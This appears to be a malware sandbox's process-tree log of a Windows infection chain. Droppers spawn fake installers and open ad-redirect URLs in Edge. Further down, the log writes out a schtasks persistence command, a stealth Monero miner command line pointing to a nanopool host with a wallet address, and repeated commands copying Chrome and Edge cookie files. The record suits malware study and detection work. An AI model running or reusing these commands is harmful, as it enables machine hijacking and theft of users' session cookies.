C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"4⤵PID:6476
-
-
-
C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1640 -
C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:6016
-
-
-
C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1540 -
C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 10005⤵
- Program crash
PID:4584
-
-
-
-
C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe"C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1528 -
C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exeC:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe4⤵PID:1684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5396
-
-
-
-
C:\Users\Admin\Documents\1fp8I1cI5udt6HxCGu4Pot5B.exe"C:\Users\Admin\Documents\1fp8I1cI5udt6HxCGu4Pot5B.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1288
-
-
C:\Users\Admin\Documents\R_dHTTFWkvGJQgRWc10ATFp3.exe"C:\Users\Admin\Documents\R_dHTTFWkvGJQgRWc10ATFp3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 2164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4388
-
-
-
C:\Users\Admin\Documents\9mjwIGTITPLyL7mQH0BWmdnw.exe"C:\Users\Admin\Documents\9mjwIGTITPLyL7mQH0BWmdnw.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\is-3P6AG.tmp\x1r61B6_PO48yubFuSiv5RUD.tmp"C:\Users\Admin\AppData\Local\Temp\is-3P6AG.tmp\x1r61B6_PO48yubFuSiv5RUD.tmp" /SL5="$2026E,138429,56832,C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\is-SKB14.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SKB14.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3688 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2072
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5600 -
C:\Users\Admin\AppData\Local\Temp\is-54F6G.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-54F6G.tmp\MediaBurner2.tmp" /SL5="$30340,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\is-IUUI5.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-IUUI5.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:1684 -
C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe" /VERYSILENT9⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\is-2JVMG.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-2JVMG.tmp\ultramediaburner.tmp" /SL5="$602A4,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe" /VERYSILENT10⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:232 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵PID:2828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\57-9f673-5d5-2b196-f9412c40530c1\Xorupulyqa.exe"C:\Users\Admin\AppData\Local\Temp\57-9f673-5d5-2b196-f9412c40530c1\Xorupulyqa.exe"9⤵PID:1372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵PID:4108
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:2024
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵PID:3736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:8576
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵PID:3696
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:6992
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4872 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:2140
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵PID:8240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:4848
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵PID:7468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x120,0x124,0x128,0x11c,0xf8,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:7984
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵PID:5732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵PID:5212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-40d04-f92-36485-db4988c48c211\Tironinebo.exe"C:\Users\Admin\AppData\Local\Temp\fa-40d04-f92-36485-db4988c48c211\Tironinebo.exe"9⤵PID:6204
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exe /eufive & exit10⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exe /eufive11⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 28012⤵
- Program crash
PID:420
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exe & exit10⤵PID:7892
-
C:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exe11⤵PID:7904
-
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"12⤵PID:3784
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit13⤵PID:8952
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'14⤵
- Creates scheduled task(s)
PID:5344
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"13⤵PID:8460
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit14⤵PID:1720
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'15⤵
- Creates scheduled task(s)
PID:5128
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"14⤵PID:8924
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth14⤵PID:6496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"12⤵PID:6692
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exeC:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe /qn CAMPAIGN="654"11⤵PID:6208
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:3512
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0uxmn01e.m5y\ufgaa.exe & exit10⤵PID:6564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe & exit10⤵PID:6948
-
C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exeC:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe11⤵PID:7780
-
C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe"C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe" -q12⤵PID:6868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6868 -s 96813⤵
- Program crash
PID:2972
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exe & exit10⤵PID:5588
-
C:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exe11⤵
- Suspicious use of SetThreadContext
PID:6736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6736 -s 177212⤵
- Program crash
PID:5196
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exe & exit10⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exe11⤵PID:7672
-
C:\Users\Admin\Documents\ZAKl954tl_dxwQ6Fjq_xNBzk.exe"C:\Users\Admin\Documents\ZAKl954tl_dxwQ6Fjq_xNBzk.exe"12⤵PID:7012
-
-
C:\Users\Admin\Documents\oZPwEtxdba8Hq852lnSLxB_Y.exe"C:\Users\Admin\Documents\oZPwEtxdba8Hq852lnSLxB_Y.exe"12⤵PID:6688
-
-
C:\Users\Admin\Documents\lIziCFK1Rfh68XBj6eK8MOCp.exe"C:\Users\Admin\Documents\lIziCFK1Rfh68XBj6eK8MOCp.exe"12⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:8068 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:7660
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8608
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:1948
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8100
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3332
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:1144
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:7300
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2848
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:1108
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8392
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:9012
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6344
-
-
-
C:\Users\Admin\Documents\aSWJ2lTdFinAaMczKTuOBIYo.exe"C:\Users\Admin\Documents\aSWJ2lTdFinAaMczKTuOBIYo.exe"12⤵PID:3332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 24013⤵
- Program crash
PID:1296
-
-
-
C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"12⤵PID:8144
-
C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"13⤵PID:6124
-
-
-
C:\Users\Admin\Documents\fNjsxToitSQAqzHmROaiuKbt.exe"C:\Users\Admin\Documents\fNjsxToitSQAqzHmROaiuKbt.exe"12⤵PID:2712
-
-
C:\Users\Admin\Documents\twIpHkTz2Hf1ZEytZ0BJc5tL.exe"C:\Users\Admin\Documents\twIpHkTz2Hf1ZEytZ0BJc5tL.exe"12⤵PID:6044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 30013⤵
- Program crash
PID:6096
-
-
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"12⤵PID:1480
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"13⤵PID:7452
-
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"13⤵PID:4396
-
-
-
C:\Users\Admin\Documents\JwuwfN8xtYrUPFIXyfOYXYSI.exe"C:\Users\Admin\Documents\JwuwfN8xtYrUPFIXyfOYXYSI.exe"12⤵PID:7480
-
-
C:\Users\Admin\Documents\j5uYgNe3CAsqgCn4t9HIv_H4.exe"C:\Users\Admin\Documents\j5uYgNe3CAsqgCn4t9HIv_H4.exe"12⤵PID:6576
-
-
C:\Users\Admin\Documents\lxfLvklOX1kNsvf7HnO5P00g.exe"C:\Users\Admin\Documents\lxfLvklOX1kNsvf7HnO5P00g.exe"12⤵PID:6056
-
-
C:\Users\Admin\Documents\IhERBeMNJnp4LsAR1xmxYQDh.exe"C:\Users\Admin\Documents\IhERBeMNJnp4LsAR1xmxYQDh.exe"12⤵PID:6104
-
-
C:\Users\Admin\Documents\uB7blAuXUI5Sa1aXj0EX_7TB.exe"C:\Users\Admin\Documents\uB7blAuXUI5Sa1aXj0EX_7TB.exe"12⤵PID:7680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 28013⤵
- Program crash
PID:8636
-
-
-
C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"12⤵PID:6452
-
